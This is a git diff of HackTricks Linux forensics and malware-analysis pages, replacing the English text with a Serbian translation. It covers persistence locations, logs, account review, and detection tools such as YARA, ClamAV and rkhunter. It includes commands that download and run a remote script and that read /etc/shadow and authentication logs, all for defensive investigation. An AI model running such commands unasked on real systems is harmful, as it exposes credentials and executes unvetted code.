- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - -## Recover Deleted Running Binaries - -Imagine a process that was executed from /tmp/exec and then deleted. It's possible to extract it - +Zamislite proces koji je izvršen iz /tmp/exec i zatim obrisan. Moguće je da se izvuče. ```bash cd /proc/3746/ #PID with the exec file deleted head -1 maps #Get address of the file. It was 08048000-08049000 dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it ``` +## Inspekcija lokacija za automatsko pokretanje -## Inspect Autostart locations - -### Scheduled Tasks - +### Zakazani zadaci ```bash cat /var/spool/cron/crontabs/* \ /var/spool/cron/atjobs \ 
@@ -235,61 +196,60 @@ cat /var/spool/cron/crontabs/* \ #MacOS ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ``` +### Usluge -### Services +Putanje gde se zlonamerni softver može instalirati kao usluga: -Paths where a malware could be installed as a service: +- **/etc/inittab**: Poziva skripte inicijalizacije kao što su rc.sysinit, usmeravajući dalje na skripte za pokretanje. +- **/etc/rc.d/** i **/etc/rc.boot/**: Sadrže skripte za pokretanje usluga, pri čemu se potonja nalazi u starijim verzijama Linux-a. +- **/etc/init.d/**: Koristi se u određenim verzijama Linux-a kao što je Debian za čuvanje skripti za pokretanje. +- Usluge se takođe mogu aktivirati putem **/etc/inetd.conf** ili **/etc/xinetd/**, u zavisnosti od varijante Linux-a. +- **/etc/systemd/system**: Direktorijum za skripte menadžera sistema i usluga. +- **/etc/systemd/system/multi-user.target.wants/**: Sadrži linkove do usluga koje treba pokrenuti u višekorisničkom režimu. +- **/usr/local/etc/rc.d/**: Za prilagođene ili usluge trećih strana. +- **\~/.config/autostart/**: Za automatske aplikacije specifične za korisnika, koje mogu biti skriveno mesto za zlonamerni softver usmeren na korisnike. +- **/lib/systemd/system/**: Podrazumevane jedinice sistema koje obezbeđuju instalirani paketi. -- **/etc/inittab**: Calls initialization scripts like rc.sysinit, directing further to startup scripts. -- **/etc/rc.d/** and **/etc/rc.boot/**: Contain scripts for service startup, the latter being found in older Linux versions. -- **/etc/init.d/**: Used in certain Linux versions like Debian for storing startup scripts. -- Services may also be activated via **/etc/inetd.conf** or **/etc/xinetd/**, depending on the Linux variant. -- **/etc/systemd/system**: A directory for system and service manager scripts. -- **/etc/systemd/system/multi-user.target.wants/**: Contains links to services that should be started in a multi-user runlevel. 
-- **/usr/local/etc/rc.d/**: For custom or third-party services. -- **\~/.config/autostart/**: For user-specific automatic startup applications, which can be a hiding spot for user-targeted malware. -- **/lib/systemd/system/**: System-wide default unit files provided by installed packages. +### Kernel moduli -### Kernel Modules +Linux kernel moduli, često korišćeni od strane zlonamernog softvera kao komponenti rootkita, učitavaju se prilikom pokretanja sistema. Direktorijumi i datoteke kritične za ove module uključuju: -Linux kernel modules, often utilized by malware as rootkit components, are loaded at system boot. The directories and files critical for these modules include: +- **/lib/modules/$(uname -r)**: Sadrži module za trenutnu verziju kernela. +- **/etc/modprobe.d**: Sadrži konfiguracione datoteke za kontrolu učitavanja modula. +- **/etc/modprobe** i **/etc/modprobe.conf**: Datoteke za globalne postavke modula. -- **/lib/modules/$(uname -r)**: Holds modules for the running kernel version. -- **/etc/modprobe.d**: Contains configuration files to control module loading. -- **/etc/modprobe** and **/etc/modprobe.conf**: Files for global module settings. +### Druge lokacije za automatsko pokretanje -### Other Autostart Locations +Linux koristi razne datoteke za automatsko izvršavanje programa prilikom prijavljivanja korisnika, potencijalno skrivajući zlonamerni softver: -Linux employs various files for automatically executing programs upon user login, potentially harboring malware: +- **/etc/profile.d/**\*, **/etc/profile**, i **/etc/bash.bashrc**: Izvršavaju se za bilo koju prijavu korisnika. +- **\~/.bashrc**, **\~/.bash_profile**, **\~/.profile**, i **\~/.config/autostart**: Datoteke specifične za korisnika koje se pokreću prilikom njihove prijave. +- **/etc/rc.local**: Izvršava se nakon što su sve sistemske usluge pokrenute, označavajući kraj prelaska na višekorisničko okruženje. 
-- **/etc/profile.d/**\*, **/etc/profile**, and **/etc/bash.bashrc**: Executed for any user login. -- **\~/.bashrc**, **\~/.bash_profile**, **\~/.profile**, and **\~/.config/autostart**: User-specific files that run upon their login. -- **/etc/rc.local**: Runs after all system services have started, marking the end of the transition to a multiuser environment. +## Istraži logove -## Examine Logs +Linux sistemi prate aktivnosti korisnika i događaje sistema kroz razne log datoteke. Ovi logovi su ključni za identifikaciju neovlašćenog pristupa, infekcija zlonamernim softverom i drugih bezbednosnih incidenata. Ključne log datoteke uključuju: -Linux systems track user activities and system events through various log files. These logs are pivotal for identifying unauthorized access, malware infections, and other security incidents. Key log files include: - -- **/var/log/syslog** (Debian) or **/var/log/messages** (RedHat): Capture system-wide messages and activities. -- **/var/log/auth.log** (Debian) or **/var/log/secure** (RedHat): Record authentication attempts, successful and failed logins. - - Use `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` to filter relevant authentication events. -- **/var/log/boot.log**: Contains system startup messages. -- **/var/log/maillog** or **/var/log/mail.log**: Logs email server activities, useful for tracking email-related services. -- **/var/log/kern.log**: Stores kernel messages, including errors and warnings. -- **/var/log/dmesg**: Holds device driver messages. -- **/var/log/faillog**: Records failed login attempts, aiding in security breach investigations. -- **/var/log/cron**: Logs cron job executions. -- **/var/log/daemon.log**: Tracks background service activities. -- **/var/log/btmp**: Documents failed login attempts. -- **/var/log/httpd/**: Contains Apache HTTPD error and access logs. -- **/var/log/mysqld.log** or **/var/log/mysql.log**: Logs MySQL database activities. 
-- **/var/log/xferlog**: Records FTP file transfers. -- **/var/log/**: Always check for unexpected logs here. +- **/var/log/syslog** (Debian) ili **/var/log/messages** (RedHat): Zabeležavaju poruke i aktivnosti širom sistema. +- **/var/log/auth.log** (Debian) ili **/var/log/secure** (RedHat): Beleže pokušaje autentifikacije, uspešne i neuspešne prijave. +- Koristite `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` za filtriranje relevantnih događaja autentifikacije. +- **/var/log/boot.log**: Sadrži poruke o pokretanju sistema. +- **/var/log/maillog** ili **/var/log/mail.log**: Logovi aktivnosti email servera, korisni za praćenje usluga vezanih za email. +- **/var/log/kern.log**: Čuva poruke kernela, uključujući greške i upozorenja. +- **/var/log/dmesg**: Sadrži poruke drajvera uređaja. +- **/var/log/faillog**: Beleži neuspešne pokušaje prijave, pomažući u istragama bezbednosnih proboja. +- **/var/log/cron**: Logovi izvršavanja cron poslova. +- **/var/log/daemon.log**: Prati aktivnosti pozadinskih usluga. +- **/var/log/btmp**: Dokumentuje neuspešne pokušaje prijave. +- **/var/log/httpd/**: Sadrži Apache HTTPD greške i logove pristupa. +- **/var/log/mysqld.log** ili **/var/log/mysql.log**: Logovi aktivnosti MySQL baze podataka. +- **/var/log/xferlog**: Beleži FTP prenose datoteka. +- **/var/log/**: Uvek proverite za neočekivane logove ovde. > [!NOTE] -> Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. Because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering. +> Linux sistemski logovi i audit pod-sistemi mogu biti onemogućeni ili obrisani tokom upada ili incidenta sa zlonamernim softverom. 
Pošto logovi na Linux sistemima obično sadrže neke od najkorisnijih informacija o zlonamernim aktivnostima, napadači ih rutinski brišu. Stoga, prilikom ispitivanja dostupnih log datoteka, važno je tražiti praznine ili neuredne unose koji bi mogli biti indikacija brisanja ili manipulacije. -**Linux maintains a command history for each user**, stored in: +**Linux održava istoriju komandi za svakog korisnika**, koja se čuva u: - \~/.bash_history - \~/.zsh_history 
@@ -297,42 +257,39 @@ Linux systems track user activities and system events through various log files. - \~/.python_history - \~/.\*\_history -Moreover, the `last -Faiwx` command provides a list of user logins. Check it for unknown or unexpected logins. +Pored toga, komanda `last -Faiwx` pruža listu prijava korisnika. Proverite je za nepoznate ili neočekivane prijave. -Check files that can grant extra rprivileges: +Proverite datoteke koje mogu dodeliti dodatne privilegije: -- Review `/etc/sudoers` for unanticipated user privileges that may have been granted. -- Review `/etc/sudoers.d/` for unanticipated user privileges that may have been granted. -- Examine `/etc/groups` to identify any unusual group memberships or permissions. -- Examine `/etc/passwd` to identify any unusual group memberships or permissions. +- Pregledajte `/etc/sudoers` za neočekivane privilegije korisnika koje su možda dodeljene. +- Pregledajte `/etc/sudoers.d/` za neočekivane privilegije korisnika koje su možda dodeljene. +- Istražite `/etc/groups` da identifikujete bilo kakva neobična članstva u grupama ili dozvole. +- Istražite `/etc/passwd` da identifikujete bilo kakva neobična članstva u grupama ili dozvole. -Some apps alse generates its own logs: +Neke aplikacije takođe generišu svoje logove: -- **SSH**: Examine _\~/.ssh/authorized_keys_ and _\~/.ssh/known_hosts_ for unauthorized remote connections. -- **Gnome Desktop**: Look into _\~/.recently-used.xbel_ for recently accessed files via Gnome applications. -- **Firefox/Chrome**: Check browser history and downloads in _\~/.mozilla/firefox_ or _\~/.config/google-chrome_ for suspicious activities. -- **VIM**: Review _\~/.viminfo_ for usage details, such as accessed file paths and search history. -- **Open Office**: Check for recent document access that may indicate compromised files. -- **FTP/SFTP**: Review logs in _\~/.ftp_history_ or _\~/.sftp_history_ for file transfers that might be unauthorized. 
-- **MySQL**: Investigate _\~/.mysql_history_ for executed MySQL queries, potentially revealing unauthorized database activities. -- **Less**: Analyze _\~/.lesshst_ for usage history, including viewed files and commands executed. -- **Git**: Examine _\~/.gitconfig_ and project _.git/logs_ for changes to repositories. +- **SSH**: Istražite _\~/.ssh/authorized_keys_ i _\~/.ssh/known_hosts_ za neovlašćene udaljene konekcije. +- **Gnome Desktop**: Pogledajte _\~/.recently-used.xbel_ za nedavno pristupane datoteke putem Gnome aplikacija. +- **Firefox/Chrome**: Proverite istoriju pretraživača i preuzimanja u _\~/.mozilla/firefox_ ili _\~/.config/google-chrome_ za sumnjive aktivnosti. +- **VIM**: Pregledajte _\~/.viminfo_ za detalje o korišćenju, kao što su pristupane putanje datoteka i istorija pretrage. +- **Open Office**: Proverite za nedavni pristup dokumentima koji mogu ukazivati na kompromitovane datoteke. +- **FTP/SFTP**: Pregledajte logove u _\~/.ftp_history_ ili _\~/.sftp_history_ za prenose datoteka koji bi mogli biti neovlašćeni. +- **MySQL**: Istražite _\~/.mysql_history_ za izvršene MySQL upite, što može otkriti neovlašćene aktivnosti u bazi podataka. +- **Less**: Analizirajte _\~/.lesshst_ za istoriju korišćenja, uključujući pregledane datoteke i izvršene komande. +- **Git**: Istražite _\~/.gitconfig_ i projekat _.git/logs_ za promene u repozitorijumima. -### USB Logs +### USB logovi -[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables. +[**usbrip**](https://github.com/snovvcrash/usbrip) je mali komad softvera napisan u čistom Python 3 koji analizira Linux log datoteke (`/var/log/syslog*` ili `/var/log/messages*` u zavisnosti od distribucije) za konstruisanje tabela istorije događaja USB-a. 
-It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USBs to find "violation events" (the use of USBs that aren't inside that list). - -### Installation +Zanimljivo je **znati sve USB uređaje koji su korišćeni** i biće korisnije ako imate ovlašćenu listu USB uređaja da pronađete "događaje kršenja" (korišćenje USB uređaja koji nisu na toj listi). +### Instalacija ```bash pip3 install usbrip usbrip ids download #Download USB ID database ``` - -### Examples - +### Primeri ```bash usbrip events history #Get USB history of your curent linux machine usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user @@ -340,40 +297,30 @@ usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR usbrip ids download #Downlaod database usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid ``` +Više primera i informacija unutar github-a: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) -More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) +## Pregled korisničkih naloga i aktivnosti prijavljivanja -
+Istražite _**/etc/passwd**_, _**/etc/shadow**_ i **bezbednosne logove** za neobična imena ili naloge koji su kreirani i ili korišćeni u bliskoj blizini poznatih neovlašćenih događaja. Takođe, proverite moguće sudo brute-force napade.\ +Pored toga, proverite datoteke kao što su _**/etc/sudoers**_ i _**/etc/groups**_ za neočekivane privilegije dodeljene korisnicima.\ +Na kraju, potražite naloge sa **bez lozinki** ili **lako pogađanim** lozinkama. -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +## Istraživanje fajl sistema -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +### Analiza struktura fajl sistema u istraživanju malvera -## Review User Accounts and Logon Activities +Kada istražujete incidente sa malverom, struktura fajl sistema je ključni izvor informacija, otkrivajući kako redosled događaja tako i sadržaj malvera. Međutim, autori malvera razvijaju tehnike za ometanje ove analize, kao što su modifikovanje vremenskih oznaka fajlova ili izbegavanje fajl sistema za skladištenje podataka. -Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\ -Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\ -Finally, look for accounts with **no passwords** or **easily guessed** passwords. - -## Examine File System - -### Analyzing File System Structures in Malware Investigation - -When investigating malware incidents, the structure of the file system is a crucial source of information, revealing both the sequence of events and the malware's content. 
However, malware authors are developing techniques to hinder this analysis, such as modifying file timestamps or avoiding the file system for data storage. - -To counter these anti-forensic methods, it's essential to: - -- **Conduct a thorough timeline analysis** using tools like **Autopsy** for visualizing event timelines or **Sleuth Kit's** `mactime` for detailed timeline data. -- **Investigate unexpected scripts** in the system's $PATH, which might include shell or PHP scripts used by attackers. -- **Examine `/dev` for atypical files**, as it traditionally contains special files, but may house malware-related files. -- **Search for hidden files or directories** with names like ".. " (dot dot space) or "..^G" (dot dot control-G), which could conceal malicious content. -- **Identify setuid root files** using the command: `find / -user root -perm -04000 -print` This finds files with elevated permissions, which could be abused by attackers. -- **Review deletion timestamps** in inode tables to spot mass file deletions, possibly indicating the presence of rootkits or trojans. -- **Inspect consecutive inodes** for nearby malicious files after identifying one, as they may have been placed together. -- **Check common binary directories** (_/bin_, _/sbin_) for recently modified files, as these could be altered by malware. +Da biste se suprotstavili ovim anti-forenzičkim metodama, važno je: +- **Sprovesti temeljnu analizu vremenske linije** koristeći alate kao što su **Autopsy** za vizualizaciju vremenskih linija događaja ili **Sleuth Kit's** `mactime` za detaljne podatke o vremenskoj liniji. +- **Istražiti neočekivane skripte** u sistemskom $PATH, koje mogu uključivati shell ili PHP skripte koje koriste napadači. +- **Istražiti `/dev` za atipične fajlove**, jer tradicionalno sadrži specijalne fajlove, ali može sadržati i fajlove povezane sa malverom. +- **Pretražiti skrivene fajlove ili direktorijume** sa imenima kao što su ".. 
" (tačka tačka razmak) ili "..^G" (tačka tačka kontrola-G), koji mogu prikrivati zlonamerni sadržaj. +- **Identifikovati setuid root fajlove** koristeći komandu: `find / -user root -perm -04000 -print` Ovo pronalazi fajlove sa povišenim privilegijama, koje napadači mogu zloupotrebiti. +- **Pregledati vremenske oznake brisanja** u inode tabelama kako bi se uočila masovna brisanja fajlova, što može ukazivati na prisustvo rootkit-ova ili trojanaca. +- **Inspektovati uzastopne inode** za obližnje zlonamerne fajlove nakon identifikacije jednog, jer su možda postavljeni zajedno. +- **Proveriti uobičajene binarne direktorijume** (_/bin_, _/sbin_) za nedavno modifikovane fajlove, jer bi ovi mogli biti izmenjeni od strane malvera. ````bash # List recent files in a directory: ls -laR --sort=time /bin``` 
@@ -381,58 +328,43 @@ ls -laR --sort=time /bin``` # Sort files in a directory by inode: ls -lai /bin | sort -n``` ```` - > [!NOTE] -> Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modified at the **same time** as the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**. +> Imajte na umu da **napadač** može **modifikovati** **vreme** kako bi **datoteke izgledale** **legitimno**, ali ne može **modifikovati** **inode**. Ako otkrijete da **datoteka** pokazuje da je kreirana i modifikovana u **isto vreme** kao i ostale datoteke u istoj fascikli, ali je **inode** **neočekivano veći**, onda su **vremenske oznake te datoteke modifikovane**. -## Compare files of different filesystem versions +## Upoređivanje datoteka različitih verzija datotečnog sistema -### Filesystem Version Comparison Summary +### Sažetak upoređivanja verzija datotečnog sistema -To compare filesystem versions and pinpoint changes, we use simplified `git diff` commands: - -- **To find new files**, compare two directories: +Da bismo uporedili verzije datotečnog sistema i precizno odredili promene, koristimo pojednostavljene `git diff` komande: +- **Da pronađete nove datoteke**, uporedite dve fascikle: ```bash git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/ ``` - -- **For modified content**, list changes while ignoring specific lines: - +- **Za izmenjen sadržaj**, navedite promene ignorišući specifične linije: ```bash git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time" ``` - -- **To detect deleted files**: - +- **Da biste otkrili obrisane fajlove**: ```bash git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ ``` +- **Opcije filtriranja** (`--diff-filter`) 
pomažu u sužavanju na specifične promene kao što su dodati (`A`), obrisani (`D`), ili izmenjeni (`M`) fajlovi. +- `A`: Dodati fajlovi +- `C`: Kopirani fajlovi +- `D`: Obrisani fajlovi +- `M`: Izmenjeni fajlovi +- `R`: Preimenovani fajlovi +- `T`: Promene tipa (npr., fajl u symlink) +- `U`: Neusaglašeni fajlovi +- `X`: Nepoznati fajlovi +- `B`: Pokvareni fajlovi -- **Filter options** (`--diff-filter`) help narrow down to specific changes like added (`A`), deleted (`D`), or modified (`M`) files. - - `A`: Added files - - `C`: Copied files - - `D`: Deleted files - - `M`: Modified files - - `R`: Renamed files - - `T`: Type changes (e.g., file to symlink) - - `U`: Unmerged files - - `X`: Unknown files - - `B`: Broken files - -## References +## Reference - [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf) - [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) - [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203) -- **Book: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides** +- **Knjiga: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides** {{#include ../../banners/hacktricks-training.md}} - -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/src/forensics/basic-forensic-methodology/malware-analysis.md b/src/forensics/basic-forensic-methodology/malware-analysis.md index c7edd6650..29df6e28a 100644 --- a/src/forensics/basic-forensic-methodology/malware-analysis.md +++ b/src/forensics/basic-forensic-methodology/malware-analysis.md @@ -1,12 +1,12 @@ -# Malware Analysis +# Analiza Malvera {{#include ../../banners/hacktricks-training.md}} -## Forensics CheatSheets +## Forenzičke CheatSheets [https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/) -## Online Services +## Online Usluge - [VirusTotal](https://www.virustotal.com/gui/home/upload) - [HybridAnalysis](https://www.hybrid-analysis.com) 
@@ -14,136 +14,119 @@ - [Intezer](https://analyze.intezer.com) - [Any.Run](https://any.run/) -## Offline Antivirus and Detection Tools +## Offline Antivirus i Alati za Detekciju ### Yara -#### Install - +#### Instaliraj ```bash sudo apt-get install -y yara ``` +#### Pripremite pravila -#### Prepare rules - -Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -Create the _**rules**_ directory and execute it. This will create a file called _**malware_rules.yar**_ which contains all the yara rules for malware. - +Koristite ovaj skript za preuzimanje i spajanje svih yara pravila za malware sa github-a: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Kreirajte _**rules**_ direktorijum i izvršite ga. Ovo će kreirati datoteku pod nazivom _**malware_rules.yar**_ koja sadrži sva yara pravila za malware. ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules python malware_yara_rules.py ``` - -#### Scan - +#### Skeniranje ```bash yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar folder #Scan the whole folder ``` +#### YaraGen: Proverite malver i kreirajte pravila -#### YaraGen: Check for malware and Create rules - -You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. 
Check out these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) - +Možete koristiti alat [**YaraGen**](https://github.com/Neo23x0/yarGen) za generisanje yara pravila iz binarnog fajla. Pogledajte ove tutorijale: [**Deo 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Deo 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Deo 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) ```bash - python3 yarGen.py --update - python3.exe yarGen.py --excludegood -m ../../mals/ +python3 yarGen.py --update +python3.exe yarGen.py --excludegood -m ../../mals/ ``` - ### ClamAV -#### Install - +#### Instaliraj ``` sudo apt-get install -y clamav ``` - -#### Scan - +#### Skeniranje ```bash sudo freshclam #Update rules clamscan filepath #Scan 1 file clamscan folderpath #Scan the whole folder ``` - ### [Capa](https://github.com/mandiant/capa) -**Capa** detects potentially malicious **capabilities** in executables: PE, ELF, .NET. So it will find things such as Att\&ck tactics, or suspicious capabilities such as: +**Capa** detektuje potencijalno zlonamerne **kapacitete** u izvršnim datotekama: PE, ELF, .NET. Tako će pronaći stvari kao što su Att\&ck taktike, ili sumnjivi kapaciteti kao što su: -- check for OutputDebugString error -- run as a service -- create process +- provera za OutputDebugString grešku +- pokretanje kao servis +- kreiranje procesa -Get it int he [**Github repo**](https://github.com/mandiant/capa). +Preuzmite ga u [**Github repozitorijumu**](https://github.com/mandiant/capa). ### IOCs -IOC means Indicator Of Compromise. 
An IOC is a set of **conditions that identify** some potentially unwanted software or confirmed **malware**. Blue Teams use this kind of definition to **search for this kind of malicious files** in their **systems** and **networks**.\ -To share these definitions is very useful as when malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster. +IOC znači Indikator Kompromitacije. IOC je skup **uslova koji identifikuju** neki potencijalno neželjeni softver ili potvrđeni **malver**. Plave ekipe koriste ovu vrstu definicije da **traže ovakve zlonamerne datoteke** u svojim **sistemima** i **mrežama**.\ +Deljenje ovih definicija je veoma korisno jer kada se malver identifikuje na računaru i kreira se IOC za taj malver, druge Plave ekipe mogu to koristiti da brže identifikuju malver. -A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ -You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**. +Alat za kreiranje ili modifikovanje IOCs je [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ +Možete koristiti alate kao što su [**Redline**](https://www.fireeye.com/services/freeware/redline.html) da **tražite definisane IOCs na uređaju**. ### Loki -[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\ -Detection is based on four detection methods: - +[**Loki**](https://github.com/Neo23x0/Loki) je skener za Simple Indicators of Compromise.\ +Detekcija se zasniva na četiri metode detekcije: ``` 1. File Name IOC - Regex match on full file path/name +Regex match on full file path/name 2. Yara Rule Check - Yara signature matches on file data and process memory +Yara signature matches on file data and process memory 3. 
Hash Check - Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files +Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files 4. C2 Back Connect Check - Compares process connection endpoints with C2 IOCs (new since version v.10) +Compares process connection endpoints with C2 IOCs (new since version v.10) ``` - ### Linux Malware Detect -[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) je skener malvera za Linux koji je objavljen pod GNU GPLv2 licencom, a dizajniran je oko pretnji sa kojima se suočavaju deljeni hostovani okruženja. Koristi podatke o pretnjama iz sistema za detekciju upada na mrežnom rubu kako bi izvukao malver koji se aktivno koristi u napadima i generiše potpise za detekciju. Pored toga, podaci o pretnjama se takođe dobijaju iz korisničkih prijava putem LMD checkout funkcije i resursa zajednice malvera. ### rkhunter -Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware. - +Alati poput [**rkhunter**](http://rkhunter.sourceforge.net) mogu se koristiti za proveru datotečnog sistema na moguće **rootkitove** i malver. ```bash sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress] ``` - ### FLOSS -[**FLOSS**](https://github.com/mandiant/flare-floss) is a tool that will try to find obfuscated strings inside executables using different techniques. 
+[**FLOSS**](https://github.com/mandiant/flare-floss) je alat koji pokušava da pronađe obfuskirane stringove unutar izvršnih datoteka koristeći različite tehnike. ### PEpper -[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules). +[PEpper ](https://github.com/Th3Hurrican3/PEpper)proverava neke osnovne stvari unutar izvršne datoteke (binarni podaci, entropija, URL-ovi i IP adrese, neka yara pravila). ### PEstudio -[PEstudio](https://www.winitor.com/download) is a tool that allows to get information of Windows executables such as imports, exports, headers, but also will check virus total and find potential Att\&ck techniques. +[PEstudio](https://www.winitor.com/download) je alat koji omogućava dobijanje informacija o Windows izvršnim datotekama kao što su uvozi, izvozi, zaglavlja, ali takođe proverava virus total i pronalazi potencijalne Att\&ck tehnike. ### Detect It Easy(DiE) -[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is a tool to detect if a file is **encrypted** and also find **packers**. +[**DiE**](https://github.com/horsicq/Detect-It-Easy/) je alat za detekciju da li je datoteka **kriptovana** i takođe pronalazi **pakere**. ### NeoPI -[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**. +[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)je Python skripta koja koristi razne **statističke metode** za detekciju **obfuskovanog** i **kriptovanog** sadržaja unutar tekstualnih/skript datoteka. Namena NeoPI-a je da pomogne u **detekciji skrivenog web shell koda**. 
### **php-malware-finder** -[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells. +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) daje sve od sebe da detektuje **obfuskovani**/**sumnjivi kod** kao i datoteke koje koriste **PHP** funkcije često korišćene u **malverima**/webshell-ima. ### Apple Binary Signatures -When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.** - +Kada proveravate neki **uzorak malvera**, uvek treba da **proverite potpis** binarne datoteke jer **razvijač** koji je potpisao može već biti **povezan** sa **malverom.** ```bash #Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" 
